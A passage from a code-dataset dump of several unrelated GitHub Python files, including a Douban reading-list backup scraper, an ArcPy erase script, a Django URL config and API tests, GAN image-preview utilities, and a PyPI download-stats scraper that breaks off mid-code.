model_site.split(site_part2)[0] # https://book.douban.com/people/[id]/collect?start=\r\n site_part3 = model_site.split(site_part2)[1] # &sort=time&rating=all&filter=all&mode=grid\r\n\r\n site_list = []\r\n for i in range(max_page_num):\r\n site_part2_num = str(i * 15)\r\n page_site = site_part1 + site_part2_num + site_part3\r\n site_list.append(page_site)\r\n return site_list\r\n\r\n# 获取读过的书的页面 wd\r\ndef get_readed_wd(site):\r\n option = webdriver.ChromeOptions()\r\n # option.add_experimental_option('detach', True) # 不自动关闭浏览器\r\n # option.add_experimental_option('excludeSwitches', ['enable-automation'])\r\n # option.add_experimental_option('useAutomationExtension', False)\r\n \r\n # 使用本地debugger模式,可以提前登录\r\n option.add_experimental_option('debuggerAddress','127.0.0.1:9222')\r\n wd = webdriver.Chrome(options=option)\r\n wd.implicitly_wait(10)\r\n wd.maximize_window()\r\n\r\n # print(wd.execute_script(\"return window.navigator.userAgent\"))\r\n # wd.execute_cdp_cmd('Network.setUserAgentOverride', {\"userAgent\": user_agent})\r\n\r\n # # 默认window.navigator.webdriver=true\r\n # script = '''\r\n # Object.defineProperty(navigator, 'webdriver', {\r\n # get: () => false\r\n # })\r\n # '''\r\n # wd.execute_cdp_cmd(\"Page.addScriptToEvaluateOnNewDocument\", {\"source\": script})\r\n\r\n wd.get(site)\r\n time.sleep(3)\r\n\r\n # 登录\r\n try:\r\n wd.find_element(By.CLASS_NAME, 'top-nav-info').click()\r\n time.sleep(1)\r\n wd.find_element(By.CLASS_NAME, 'account-tab-account').click()\r\n time.sleep(2)\r\n\r\n account = wd.find_element(By.ID, 'username')\r\n pwd = wd.find_element(By.ID, 'password')\r\n account.clear()\r\n pwd.clear()\r\n account.send_keys(douban_config.douban_id)\r\n pwd.send_keys(douban_config.douban_pwd)\r\n\r\n login = wd.find_element(By.XPATH, '//div[@class=\"account-form-field-submit \"]//a[@class=\"btn btn-account btn-active\"]')\r\n login.click() # 这里需要自己点一下验证码图片\r\n time.sleep(10)\r\n except NoSuchElementException:\r\n # 找不到该元素表示已登录\r\n print('已登录')\r\n time.sleep(1)\r\n wd.find_element(By.XPATH, '//a[@class=\"bn-more\"]').click()\r\n\r\n # 打开个人主页\r\n wd.find_element(By.XPATH, '//a[@class=\"bn-more\"]').click()\r\n wd.find_element(By.XPATH, '//div[@class=\"more-items\"]//a').click()\r\n time.sleep(2)\r\n\r\n # 读过(我这里只有想读、读过的记录,没有在读)读过是第2项\r\n readed = wd.find_element(By.XPATH, '//div[@id=\"book\"]//h2//a[@target=\"_blank\"][2]')\r\n readed_site = readed.get_attribute('href')\r\n # print(readed_site)\r\n readed.click()\r\n\r\n # switch to new window 切换到新的窗口\r\n for handle in wd.window_handles:\r\n wd.switch_to.window(handle)\r\n if(wd.current_url == readed_site):\r\n break\r\n\r\n time.sleep(2)\r\n return wd\r\n\r\n# 获取一页的数据内容\r\ndef get_one_page(wd, page_site):\r\n try:\r\n wd.get(page_site)\r\n time.sleep(2)\r\n except selenium.common.exceptions.TimeoutException:\r\n time.sleep(5)\r\n wd.get(page_site)\r\n\r\n pic_list = [] # 图书图片List\r\n pic_values = wd.find_elements(By.XPATH, '//li[@class=\"subject-item\"]//img') # 图书图片\r\n for value in pic_values:\r\n pic_site = value.get_attribute('src')\r\n pic_list.append(pic_site)\r\n # print(pic_list)\r\n\r\n book_site_list = [] # 图片链接List\r\n book_name_list = [] # 图书名称List\r\n book_values = wd.find_elements(By.XPATH, '//li[@class=\"subject-item\"]//div[@class=\"info\"]//h2//a')\r\n for value in book_values:\r\n book_site = value.get_attribute('href')\r\n book_site_list.append(book_site)\r\n book_name = value.text\r\n book_name_list.append(book_name)\r\n # print(book_site_list)\r\n # print(book_name_list)\r\n\r\n author_list = [] # 作者信息List\r\n author_info = wd.find_elements(By.XPATH, '//li[@class=\"subject-item\"]//div[@class=\"info\"]//div[@class=\"pub\"]')\r\n for value in author_info:\r\n author_list.append(value.text)\r\n # print(author_list)\r\n\r\n tags_list = [] # 标签List\r\n tag_values = wd.find_elements(By.XPATH, '//li[@class=\"subject-item\"]//div[@class=\"info\"]//div[@class=\"short-note\"]//span[@class=\"tags\"]')\r\n for value in tag_values:\r\n tags_list.append(value.text.split(':')[1].strip())\r\n # print(tags_list)\r\n\r\n date_list = [] # 读过日期List\r\n date_values = wd.find_elements(By.XPATH, '//li[@class=\"subject-item\"]//div[@class=\"info\"]//div[@class=\"short-note\"]//span[@class=\"date\"]')\r\n for value in date_values:\r\n date_list.append(value.text.split()[0])\r\n # print(date_list)\r\n\r\n rating_list = [] # 评分List(星星)\r\n rating_num_list = [] # 评分List(数字)\r\n rating_values = wd.find_elements(By.XPATH, '//li[@class=\"subject-item\"]//div[@class=\"info\"]//div[@class=\"short-note\"]//span[1]')\r\n for value in rating_values:\r\n rate = value.get_attribute('class')[6] # str 5/4/3/2/1\r\n rating_num_list.append(int(rate))\r\n rating_list.append(douban_config.rating_dict[rate])\r\n # print(rating_list)\r\n # print(rating_num_list)\r\n\r\n comment_list = [] # 短评List\r\n comment_values = wd.find_elements(By.XPATH, '//li[@class=\"subject-item\"]//div[@class=\"info\"]//div[@class=\"short-note\"]//p[@class=\"comment\"]')\r\n for value in comment_values:\r\n comment_list.append(value.text)\r\n # print(comment_list)\r\n\r\n num = len(book_name_list)\r\n data_list = []\r\n for i in range(num):\r\n data_list.append([book_name_list[i], book_site_list[i], author_list[i], tags_list[i], date_list[i], comment_list[i], rating_num_list[i], rating_list[i], pic_list[i]])\r\n return data_list\r\n\r\n# 把记录数据List 全部存入数据库\r\ndef insert_into_db(db_file, table_name, data_list):\r\n columns = ['name', 'site', 'author', 'tags', 'date', 'comments', 'rating_num', 'rating', 'pic']\r\n\r\n sql = z_db.get_insert_sql_by_colum_names(table_name, columns)\r\n # print(sql) # insert into books (name, site, author, tags, date, comments, rating, pic) values (?, ?, ?, ?, ?, ?, ?, ?)\r\n z_db.insert_into_db(db_file, table_name, sql, data_list)\r\n\r\n# 把记录数据List 全部存入Excel表\r\ndef write_to_excel(ex_file, sheet_name, data_list):\r\n if(os.path.exists(ex_file)):\r\n book = openpyxl.load_workbook(ex_file)\r\n if(sheet_name in book.sheetnames):\r\n sheet = book[sheet_name]\r\n else:\r\n sheet = book.create_sheet(sheet_name)\r\n else:\r\n book = openpyxl.Workbook()\r\n sheet = book.active\r\n sheet.title = sheet_name\r\n\r\n for data_line in data_list:\r\n sheet.append(data_line)\r\n book.save(ex_file)\r\n\r\n# main\r\ndef main():\r\n site = douban_config.books_site\r\n wd = get_readed_wd(site)\r\n\r\n num_site_list = get_max_page_num(wd) # [最大页数, 模板url]\r\n\r\n max_page_num = num_site_list[0] # 最大页数\r\n # print(max_page_num) # 21\r\n model_site = num_site_list[1] # 模板url\r\n # print(model_site) # https://book.douban.com/people/[id]/collect?start=300&sort=time&rating=all&filter=all&mode=grid\r\n \r\n page_site_list = get_page_site_list(max_page_num, model_site) # 获取所有页数的链接List\r\n\r\n all_page_data_list = [] # 所有页面的数据信息\r\n for page_site in page_site_list:\r\n # print(page_site)\r\n print('------------第', page_site_list.index(page_site)+1, '页')\r\n one_page_data_list = get_one_page(wd, page_site)\r\n time.sleep(2)\r\n all_page_data_list = all_page_data_list + one_page_data_list\r\n # print(all_page_data_list)\r\n wd.quit()\r\n\r\n all_page_data_list.reverse() # 倒序\r\n\r\n # 读过的书籍数据信息写入数据库\r\n db_file = douban_config.db_file\r\n table_name = douban_config.books_table_name\r\n insert_into_db(db_file, table_name, all_page_data_list)\r\n time.sleep(3)\r\n\r\n # 读过的书籍数据信息写入Excel表格\r\n ex_file = douban_config.ex_file\r\n sheet_name = douban_config.book_sheet_name\r\n write_to_excel(ex_file, sheet_name, all_page_data_list)\r\n\r\n print('--------------------- Douban 已读书目 记录保存成功!')\r\n\r\n# 清空数据库表数据\r\n# z_db.delete_table(douban_config.db_file, douban_config.books_table_name)\r\n\r\n# main()","repo_name":"hduzn/own_douban_backup","sub_path":"books.py","file_name":"books.py","file_ext":"py","file_size_in_byte":9792,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"1329319116","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# Source: https://pro.arcgis.com/es/pro-app/tool-reference/analysis/erase.htm\n# Nos permitira eliminar informacion que se intersecta.\n\n# Autor \t: Ing. Daniel Ramos Mendoza\n# Web\t\t: HDRamosMendoza.github.io/Perfil-Profesional\n# Email\t\t: heber.daniel.ramos.mendoza@gmail.com\n# Móvil\t\t: 051 999130638\n# Originario: Perú - Lima\n# NOTA: No es el mejor código que eh realizado. Es una simple demo de mis inicios de un par de años atras.\nimport arcpy\nimport os\n\narcpy.env.overwriteOutput = True\narcpy.env.workspace = \"D:/RepositorioGitHub/ArcPy-GIS/Mixed/Tema_02/Capas\"\npathUrl_Result = \"D:/RepositorioGitHub/ArcPy-GIS/Project/Seccion-2/Result\"\n\nlistValues = {}\nlistValues['erase'] = []\n\n# Vamos a determinar los rios que se encuentran totalmente \n# contenidos dentro el limite del departamento. Haremos uso de analisis anterior (Rios_Cruce_Departamento)\nlistValues['erase'].append({\n\t\t'inFeatures' \t: \"Rios_Quebradas.shp\",\n\t\t'eraseFeatures'\t: os.path.join(pathUrl_Result, \"SpatialJoin/Rios_Cruce_Departamento.shp\"),\n\t\t'outFeatures' \t: os.path.join(pathUrl_Result, \"Erase/Rios_Completo.shp\")\n\t})\n\n# Se realizara un inventario forestal.\nlistValues['erase'].append({\n\t\t'inFeatures' \t: \"Forestal.shp\",\n\t\t'eraseFeatures'\t: \"Departamnentos_No.shp\",\n\t\t'outFeatures' \t: os.path.join(pathUrl_Result, \"Erase/Forestal_Proyecto.shp\")\n\t})\n\n# Se necesita los restos arqueologicos que no se \n# encuentren cerca a un rio en un radio de 100 metros.\nlistValues['erase'].append({\n\t\t'inFeatures' \t: \"Restos_Arqueologicos.shp\",\n\t\t'eraseFeatures'\t: os.path.join(pathUrl_Result, \"SpatialJoin/Arqueologia_100m.shp\"),\n\t\t'outFeatures' \t: os.path.join(pathUrl_Result, \"Erase/Restos_Mayores_100.shp\")\n\t})\n\nfor item in listValues['erase']:\n\tarcpy.Erase_analysis(\n\t\tin_features \t\t= item['inFeatures'],\n\t\terase_features \t\t= item['eraseFeatures'],\n\t\tout_feature_class \t= item['outFeatures']\n\t)","repo_name":"HDRamosMendoza/Python-GIS","sub_path":"ExampleAnalysis/Project/Seccion-2/2c-Erase.py","file_name":"2c-Erase.py","file_ext":"py","file_size_in_byte":1908,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"3473200785","text":"#!/usr/bin/python3\n\n# e27blank.py by Matej Kogovsek, matej@hamradio.si, 3.feb.2016\n# requires pySerial, http://pyserial.sourceforge.net\n\nimport sys,serial\n\ndef atcmd(cmnd, resp, to = 0.2):\n if ser.timeout != to:\n ser.timeout = to\n if len(cmnd) > 0:\n ser.flushInput()\n ser.write((cmnd + '\\n').encode('ascii'))\n r = ser.readline().decode('ascii').rstrip()\n if len(resp) > 0 and r.find(resp) == -1:\n if r == '': r = '(none)'\n raise Exception('Error! expected ' + resp + '\\ncmnd was: ' + cmnd + '\\nresp was: ' + r + '\\n')\n return r\n\nif len(sys.argv) < 3:\n print('usage: e27blank.py serial_if size')\n sys.exit(1)\n\nfs = int(sys.argv[2])\n\nser = serial.Serial(sys.argv[1], 115200)\ntry:\n for i in range(5):\n try:\n atcmd('AT+BUFRDDISP=0', 'OK')\n break\n except:\n pass\n if i == 4:\n print('programmer not responding')\n sys.exit(1)\n\n try:\n atcmd('AT+E27BLANK='+hex(fs)[2:].zfill(4), 'OK')\n except:\n print('Device NOT blank.')\n sys.exit(1)\n\nfinally:\n ser.close()\n\nprint('Device is blank.')\n","repo_name":"matejx/e27prog","sub_path":"py/e27blank.py","file_name":"e27blank.py","file_ext":"py","file_size_in_byte":1038,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"35950899740","text":"import typing\n\nfrom django.conf import settings\nfrom django.conf.urls.static import static\nfrom django.contrib import admin\nfrom django.urls import URLPattern, URLResolver, include, path, re_path\nfrom django.views import defaults as default_views\nfrom rest_framework_simplejwt.views import TokenObtainPairView, TokenRefreshView\nfrom wagtail import urls as wagtail_urls\nfrom wagtail.admin import urls as wagtailadmin_urls\nfrom wagtail.contrib.sitemaps.views import sitemap\nfrom wagtail.documents import urls as wagtaildocs_urls\nfrom drf_spectacular.views import (\n SpectacularAPIView,\n SpectacularSwaggerView,\n)\n\nfrom holon.urls import urlpatterns as holon_urls\nfrom holon.urls import urlpatterns_v2 as holon_urls_v2\nfrom holon.views import HolonCMSLogic, holonCMSLogicFormatter\nfrom main.views.csfr import get_csrf\nfrom main.views.error_500 import error_500_view\nfrom main.views.page_not_found import PageNotFoundView\nfrom nextjs.api import api_router\n\nhandler404 = PageNotFoundView.as_view()\nhandler500 = error_500_view\ncsrf = get_csrf\n\nURL = typing.Union[URLPattern, URLResolver]\nURLList = typing.List[URL]\n\nurlpatterns: URLList = []\n\nif settings.DEBUG:\n urlpatterns += [\n path(\n \"wt/400/\",\n default_views.bad_request,\n kwargs={\"exception\": Exception(\"Bad Request!\")},\n ), # NOQA\n path(\n \"wt/403/\",\n default_views.permission_denied,\n kwargs={\"exception\": Exception(\"Permission Denied\")},\n ), # NOQA\n path(\"wt/404/\", handler404, kwargs={\"exception\": Exception(\"Page not Found\")}), # NOQA\n path(\"wt/500/\", handler500, kwargs={\"exception\": Exception(\"Internal error\")}), # NOQA\n path(\"wt/csrf/\", csrf), # NOQA\n ]\n\n if \"debug_toolbar\" in settings.INSTALLED_APPS:\n import debug_toolbar\n\n urlpatterns += [path(\"wt/__debug__/\", include(debug_toolbar.urls))]\n\nurlpatterns += [\n path(settings.ADMIN_URL, admin.site.urls),\n path(\"wt/api/nextjs/v1/\", api_router.urls),\n path(\"wt/api/nextjs/v1/\", include(holon_urls)),\n path(\"wt/api/nextjs/v2/\", include(holon_urls_v2)),\n path(\"wt/api/schema/\", SpectacularAPIView.as_view(), name=\"schema\"),\n path(\n \"wt/api/schema/swagger\",\n SpectacularSwaggerView.as_view(url_name=\"schema\"),\n name=\"swagger-ui\",\n ),\n path(\"wt/cms/\", include(wagtailadmin_urls)),\n path(\"wt/cms/modelconfig\", HolonCMSLogic.as_view()),\n path(\"wt/cms/modelconfig/schema\", holonCMSLogicFormatter),\n path(\"wt/documents/\", include(wagtaildocs_urls)),\n path(\"wt/sitemap.xml\", sitemap, name=\"sitemap\"),\n path(\"wt/dj-rest-auth/\", include(\"dj_rest_auth.urls\")),\n path(\"wt/dj-rest-auth/registration/\", include(\"dj_rest_auth.registration.urls\")),\n path(\"wt/api/token/\", TokenObtainPairView.as_view(), name=\"token_obtain_pair\"),\n path(\"wt/api/token/refresh/\", TokenRefreshView.as_view(), name=\"token_refresh\"),\n]\n\nurlpatterns += [re_path(r\"\", include(wagtail_urls))]\n\nurlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n","repo_name":"ZEnMo/Holon-webapp","sub_path":"src/pipit/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":3056,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"7874070285","text":"# CourseResource\nfrom django.contrib.auth.models import User\nfrom django.test import TestCase\nfrom tastypie.test import ResourceTestCaseMixin\n\nfrom oppia.tests.utils import get_api_key, get_api_url\n\n\nclass CourseResourceTest(ResourceTestCaseMixin, TestCase):\n fixtures = ['user.json', 'oppia.json', 'permissions.json']\n\n def setUp(self):\n super(CourseResourceTest, self).setUp()\n user = User.objects.get(username='demo')\n admin = User.objects.get(username='admin')\n self.auth_data = {\n 'username': 'demo',\n 'api_key': get_api_key(user=user).key,\n }\n self.admin_auth = {\n 'username': 'admin',\n 'api_key': get_api_key(user=admin).key\n }\n self.url = get_api_url('course')\n\n # Post invalid\n def test_post_invalid(self):\n self.assertHttpMethodNotAllowed(self.api_client.post(self.url, format='json', data={}))\n\n # test unauthorized\n def test_unauthorized(self):\n data = {\n 'username': 'demo',\n 'api_key': '1234',\n }\n self.assertHttpUnauthorized(self.api_client.get(self.url, format='json', data=data))\n\n # test authorized\n def test_authorized(self):\n resp = self.api_client.get(self.url, format='json', data=self.auth_data)\n self.assertHttpOK(resp)\n\n # test contains courses (and right no of courses)\n def test_has_courses(self):\n resp = self.api_client.get(self.url, format='json', data=self.auth_data)\n self.assertHttpOK(resp)\n self.assertValidJSON(resp.content)\n response_data = self.deserialize(resp)\n self.assertTrue('courses' in response_data)\n # should have 2 courses with the test data set\n self.assertEquals(len(response_data['courses']), 2)\n # check each course had a download url\n for course in response_data['courses']:\n self.assertTrue('url' in course)\n self.assertTrue('shortname' in course)\n self.assertTrue('title' in course)\n self.assertTrue('version' in course)\n\n def test_course_get_single(self):\n resource_url = get_api_url('course', 1)\n resp = self.api_client.get(resource_url, format='json', data=self.auth_data)\n self.assertHttpOK(resp)\n self.assertValidJSON(resp.content)\n # check course format\n course = self.deserialize(resp)\n self.assertTrue('shortname' in course)\n self.assertTrue('title' in course)\n self.assertTrue('description' in course)\n self.assertTrue('version' in course)\n\n def test_course_get_single_not_found(self):\n resource_url = get_api_url('course', 999)\n resp = self.api_client.get(resource_url, format='json', data=self.auth_data)\n self.assertHttpNotFound(resp)\n\n def test_course_get_single_draft_nonvisible(self):\n resource_url = get_api_url('course', 3)\n resp = self.api_client.get(resource_url, format='json', data=self.auth_data)\n self.assertHttpNotFound(resp)\n\n def test_course_get_single_draft_admin_visible(self):\n resource_url = get_api_url('course', 3)\n resp = self.api_client.get(resource_url, format='json', data=self.admin_auth)\n self.assertHttpOK(resp)\n self.assertValidJSON(resp.content)\n\n def test_course_download_file_zip_not_found(self):\n resource_url = get_api_url('course', 2) + 'download/'\n resp = self.api_client.get(resource_url, format='json', data=self.auth_data)\n self.assertHttpNotFound(resp)\n\n def test_course_download_file_course_not_found(self):\n resource_url = get_api_url('course', 999) + 'download/'\n resp = self.api_client.get(resource_url, format='json', data=self.auth_data)\n self.assertHttpNotFound(resp)\n\n def test_course_download_draft_nonvisible(self):\n resource_url = get_api_url('course', 3) + 'download/'\n resp = self.api_client.get(resource_url, format='json', data=self.auth_data)\n self.assertHttpNotFound(resp)\n\n def test_course_get_activity(self):\n resource_url = get_api_url('course', 1) + 'activity/'\n resp = self.api_client.get(resource_url, format='json', data=self.auth_data)\n self.assertHttpOK(resp)\n\n def test_course_get_activity_notfound(self):\n resource_url = get_api_url('course', 999) + 'activity/'\n resp = self.api_client.get(resource_url, format='json', data=self.auth_data)\n self.assertHttpNotFound(resp)\n\n def test_course_get_activity_draft_nonvisible(self):\n resource_url = get_api_url('course', 3) + 'activity/'\n resp = self.api_client.get(resource_url, format='json', data=self.auth_data)\n self.assertHttpNotFound(resp)\n\n def test_course_get_acitivity_draft_admin_visible(self):\n resource_url = get_api_url('course', 3) + 'activity/'\n resp = self.api_client.get(resource_url, format='json', data=self.admin_auth)\n self.assertHttpOK(resp)\n","repo_name":"DigitalCampus/django-nurhi-oppia","sub_path":"oppia/tests/api/test_course.py","file_name":"test_course.py","file_ext":"py","file_size_in_byte":4962,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"71332573993","text":"import glob\nimport os\nimport torchaudio\nimport hydra\nimport numpy as np\n\nfrom collections import defaultdict\nfrom tqdm import tqdm\n\n\n@hydra.main(config_path=\"configs\", config_name=\"profiler\")\ndef main(cfg):\n all_wav_paths = glob.glob(f\"{cfg.wavs_directory_path}/*.wav\")\n emotion_dict = dict(zip(cfg.emotion_ids, cfg.emotions))\n cfg_profiler_emotion_dict = defaultdict(lambda: 0)\n for wav_path in tqdm(all_wav_paths):\n _, wav_filename = os.path.split(wav_path)\n wav, sr = torchaudio.load(wav_path)\n seconds_len = len(wav.squeeze()) // sr\n emotion = emotion_dict[int(wav_filename[-5])]\n cfg_profiler_emotion_dict[emotion] += seconds_len\n total_dataset_len = 0\n for emotion, sec_len in zip(list(cfg_profiler_emotion_dict.keys()), list(cfg_profiler_emotion_dict.values())):\n hours = np.round(sec_len / 60 / 60, 3)\n print(f\"Emotion '{emotion}': {hours} hours.\")\n total_dataset_len += hours\n print(f\"Total dataset size: {total_dataset_len} hours.\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"dariadiatlova/emo-tts-data","sub_path":"src/profiler.py","file_name":"profiler.py","file_ext":"py","file_size_in_byte":1060,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"10105861155","text":"#!/usr/bin/env python\n\nimport os\nimport random\n\nimport numpy as np\nfrom PIL import Image\n\nimport chainer\nimport chainer.cuda\nfrom chainer import Variable\n\n\ndef pix_out_image(updater, enc, dec, rows, cols, seed, dst):\n @chainer.training.make_extension()\n def make_image(trainer):\n np.random.seed(seed)\n n_images = rows * cols\n xp = enc.xp\n\n w_in = 256\n w_out = 256\n in_ch = 12\n out_ch = 3\n\n in_all = np.zeros((n_images, in_ch, w_in, w_in)).astype(\"i\")\n gt_all = np.zeros((n_images, out_ch, w_out, w_out)).astype(\"f\")\n gen_all = np.zeros((n_images, out_ch, w_out, w_out)).astype(\"f\")\n\n for it in range(n_images):\n batch = updater.get_iterator('test').next()\n batchsize = len(batch)\n\n x_in = xp.zeros((batchsize, in_ch, w_in, w_in)).astype(\"f\")\n t_out = xp.zeros((batchsize, out_ch, w_out, w_out)).astype(\"f\")\n\n for i in range(batchsize):\n x_in[i, :] = xp.asarray(batch[i][0])\n t_out[i, :] = xp.asarray(batch[i][1])\n x_in = Variable(x_in)\n\n z = enc(x_in)\n x_out = dec(z)\n\n in_all[it, :] = x_in.data[0, :]\n gt_all[it, :] = t_out[0, :]\n gen_all[it, :] = x_out.data[0, :]\n\n def save_image(x, name, mode=None):\n _, C, H, W = x.shape\n x = x.reshape((rows, cols, C, H, W))\n x = x.transpose(0, 3, 1, 4, 2)\n if C == 1:\n x = x.reshape((rows * H, cols * W))\n else:\n x = x.reshape((rows * H, cols * W, C))\n\n preview_dir = '{}/preview'.format(dst)\n preview_path = preview_dir + \\\n '/image_{}_{:0>8}.png'.format(name, trainer.updater.iteration)\n if not os.path.exists(preview_dir):\n os.makedirs(preview_dir)\n Image.fromarray(x, mode=mode).convert('RGB').save(preview_path)\n\n x = np.asarray(np.clip(gen_all * 128 + 128, 0.0, 255.0), dtype=np.uint8)\n save_image(x, \"gen\")\n\n x = np.ones((n_images, 3, w_in, w_in)).astype(np.uint8) * 255\n x[:, 0, :, :] = 0\n for i in range(12):\n x[:, 0, :, :] += np.uint8(15 * i * in_all[:, i, :, :])\n save_image(x, \"in\", mode='HSV')\n\n x = np.asarray(np.clip(gt_all * 128 + 128, 0.0, 255.0), dtype=np.uint8)\n save_image(x, \"gt\")\n\n return make_image\n\n\ndef star_out_image(updater, gen, dst, att_num=5, image_size=128, rows=4, cols=4, random_att=True):\n @chainer.training.make_extension()\n def make_image(trainer):\n xp = gen.xp\n n_images = rows * cols\n\n in_all = np.zeros((n_images, 3, image_size, image_size)).astype(\"f\")\n gen_all = np.zeros((n_images, 3, image_size, image_size)).astype(\"f\")\n\n def save_image(x, name, att, mode=None):\n _, C, H, W = x.shape\n x = x.reshape((rows, cols, C, H, W))\n x = x.transpose(0, 3, 1, 4, 2)\n if C == 1:\n x = x.reshape((rows * H, cols * W))\n else:\n x = x.reshape((rows * H, cols * W, C))\n\n preview_dir = '{}/preview'.format(dst)\n preview_path = preview_dir + \\\n '/image_{}_{:0>8}_{}.png'.format(name, trainer.updater.iteration, att)\n if not os.path.exists(preview_dir):\n os.makedirs(preview_dir)\n Image.fromarray(x, mode=mode).convert('RGB').save(preview_path)\n\n batch = updater.get_iterator('test').next()\n batchsize = len(batch)\n x_in = xp.zeros((batchsize, 3, image_size, image_size)).astype(\"f\")\n for i in range(batchsize):\n in_all[i, :] = x_in[i, :] = xp.asarray(batch[i][0])\n\n x_in = Variable(x_in)\n att = np.array([[int(k) for k in j]\n for j in [bin(i)[2:].zfill(att_num)\n for i in range(2 ** att_num)]]).astype(\"f\")\n if random_att:\n random_select = random.randint(0, len(att))\n att_part = xp.array(np.broadcast_to(att[random_select], (batchsize, att_num)))\n x_out = gen(x_in, att_part)\n\n for it in range(min(n_images, batchsize)):\n gen_all[it, :] = x_out.array[it, :]\n x = np.asarray(np.clip(gen_all * 128 + 128, 0.0, 255.0), dtype=np.uint8)\n save_image(x, \"gen\", random_select)\n else:\n for select in range(2 ** att_num):\n att_part = xp.array(np.broadcast_to(att[select], (batchsize, att_num)))\n x_out = gen(x_in, att_part)\n\n for it in range(min(n_images, batchsize)):\n gen_all[it, :] = x_out.array[it, :]\n x = np.asarray(np.clip(gen_all * 128 + 128, 0.0, 255.0), dtype=np.uint8)\n save_image(x, \"gen\", select)\n\n x = np.asarray(np.clip(in_all * 128 + 128, 0.0, 255.0), dtype=np.uint8)\n save_image(x, \"gt\", \"origin\")\n\n return make_image\n","repo_name":"AlongWY/HIT-WorkShop","sub_path":"ML/FaceGen/face_visualizer.py","file_name":"face_visualizer.py","file_ext":"py","file_size_in_byte":5024,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"10475792558","text":"import asyncio\nimport json\nimport time\nfrom datetime import date, timedelta\nfrom typing import Dict, Tuple, Union\n\nimport aiohttp\nfrom bs4 import BeautifulSoup\n\n\nLINKS: Dict[str, Tuple[str, str]] = {\n \"disnake\": (\n \"https://pypistats.org/packages/disnake\",\n \"https://api.pepy.tech/api/v2/projects/disnake\",\n ),\n \"nextcord\": (\n \"https://pypistats.org/packages/nextcord\",\n \"https://api.pepy.tech/api/v2/projects/nextcord\",\n ),\n \"pycord\": (\n \"https://pypistats.org/packages/py-cord\",\n \"https://api.pepy.tech/api/v2/projects/py-cord\",\n ),\n \"discord.py\": (\n \"https://pypistats.org/packages/discord.py\",\n \"https://api.pepy.tech/api/v2/projects/discord.py\",\n ),\n \"interactions.py\": (\n \"https://pypistats.org/packages/discord-py-interactions\",\n \"https://api.pepy.tech/api/v2/projects/discord-py-interactions\",\n ),\n \"hikari\": (\n \"https://pypistats.org/packages/hikari\",\n \"https://api.pepy.tech/api/v2/projects/hikari\",\n )\n}\n\n\nasync def parsing_pypi(library: str) -> dict:\n\n async with aiohttp.ClientSession() as session:\n\n async with session.get(url=LINKS[library][0]) as request:\n soup1 = BeautifulSoup(await request.text(), \"html.parser\")\n\n async with session.get(url=LINKS[library][1]) as request:\n reqs = await request.text()\n reqs = json.loads(reqs)\n\n div1 = soup1.find(\"div\", {\"class\": \"wrapper\"}).text.split()\n div1 = [num for num in div1 if num.replace(\",\", \"\").isdigit() or \".\" in num]\n\n last_day = f\"{date.today() - timedelta(days=1)}\"\n\n downloads_list = reqs[\"downloads\"][last_day]\n items_list = downloads_list.values()\n\n last_version2 = reqs[\"versions\"]\n last_version2.sort(key=lambda x: tuple((x.lstrip(\"v\") + \"z\").split(\".\")))\n last_version2 = last_version2[-1]\n try:\n if library == \"disnake\":\n\n return {\"last_version\": div1[0], \"downloads\": div1[1:], }, {\n \"last_version\": last_version2,\n \"total_downloads\": f\"{reqs['total_downloads']:,d}\",\n \"downloads_sum\": f\"{sum(items_list):,d}\",\n \"last_version_downloads\": f\"{downloads_list[last_version2]:,d}\",\n \"set\": last_day,\n }\n\n elif library == \"nextcord\":\n\n return {\"last_version\": div1[0], \"downloads\": div1[1:], }, {\n \"last_version\": last_version2,\n \"total_downloads\": f\"{reqs['total_downloads']:,d}\",\n \"downloads_sum\": f\"{sum(items_list):,d}\",\n \"last_version_downloads\": f\"{downloads_list[last_version2]:,d}\",\n \"set\": last_day,\n }\n\n elif library == \"pycord\":\n\n return {\"last_version\": div1[0], \"downloads\": div1[1:], }, {\n \"last_version\": last_version2,\n \"total_downloads\": f\"{reqs['total_downloads']:,d}\",\n \"downloads_sum\": f\"{sum(items_list):,d}\",\n \"last_version_downloads\": f\"{downloads_list[last_version2]:,d}\",\n \"set\": last_day,\n }\n elif library == \"discord.py\":\n\n return {\"last_version\": div1[0], \"downloads\": div1[1:], }, {\n \"last_version\": last_version2,\n \"total_downloads\": f\"{reqs['total_downloads']:,d}\",\n \"downloads_sum\": f\"{sum(items_list):,d}\",\n \"last_version_downloads\": f\"{downloads_list[last_version2]:,d}\",\n \"set\": last_day,\n }\n\n elif library == \"interactions.py\":\n\n return {\"last_version\": div1[0], \"downloads\": div1[1:], }, {\n \"last_version\": last_version2,\n \"total_downloads\": f\"{reqs['total_downloads']:,d}\",\n \"downloads_sum\": f\"{sum(items_list):,d}\",\n \"last_version_downloads\": f\"{downloads_list[last_version2]:,d}\",\n \"set\": last_day,\n }\n\n elif library == \"hikari\":\n\n last_version2 = [i for i in reqs['versions']\n if len(i) == 12 and 'dev' in i]\n last_version2.sort(key=lambda x: tuple((x + \"z\").split(\".\")))\n last_version2 = last_version2[-1]\n\n return {\"last_version\": div1[0], \"downloads\": div1[1:], }, {\n \"last_version\": last_version2,\n \"total_downloads\": f\"{reqs['total_downloads']:,d}\",\n \"downloads_sum\": f\"{sum(items_list):,d}\",\n \"last_version_downloads\": f\"{downloads_list[last_version2]:,d}\",\n \"set\": last_day,\n }\n except Exception:\n return \"not working\"\n\n\nasync def parsing_downloads(library: str) -> Dict[str, int]:\n async with aiohttp.request(\"GET\", LINKS[library][1]) as response:\n response = await response.text()\n response = json.loads(response)\n\n downloads_list = response['downloads']\n\n dates = [f\"{date.today() - timedelta(days=i)}\" for i in range(1, 31)]\n\n return {date: 